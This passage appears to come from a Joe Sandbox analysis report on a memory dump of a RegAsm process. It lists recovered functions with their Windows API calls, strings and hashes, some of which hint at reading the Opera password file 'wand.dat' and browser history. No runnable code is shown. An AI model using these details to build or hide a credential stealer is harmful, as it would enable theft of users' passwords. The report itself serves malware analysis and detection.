                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                      • String ID: gj
                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                      • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                      APIs
                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4053608372-0
                                                                                                                                                                      • Opcode ID: 72a525d074bbf2b48926c36b1cc68c9f5366c1c2a2e3fb8c8570e31a3083a8d5
                                                                                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                      • Opcode Fuzzy Hash: 72a525d074bbf2b48926c36b1cc68c9f5366c1c2a2e3fb8c8570e31a3083a8d5
                                                                                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1471605966-0
                                                                                                                                                                      • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                      • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                      APIs
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                                      • API String ID: 102104167-2245444037
                                                                                                                                                                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                      APIs
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memicmpwcslen
                                                                                                                                                                      • String ID: @@@@$History
                                                                                                                                                                      • API String ID: 1872909662-685208920
                                                                                                                                                                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                      • String ID: caption
                                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                      • API String ID: 210187428-168460110
                                                                                                                                                                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                      APIs
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                      • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                      • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                                                                                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3550944819-0
                                                                                                                                                                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                      APIs
                                                                                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$free
                                                                                                                                                                      • String ID: g4@
                                                                                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                                                                                      • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                      • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                      APIs
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
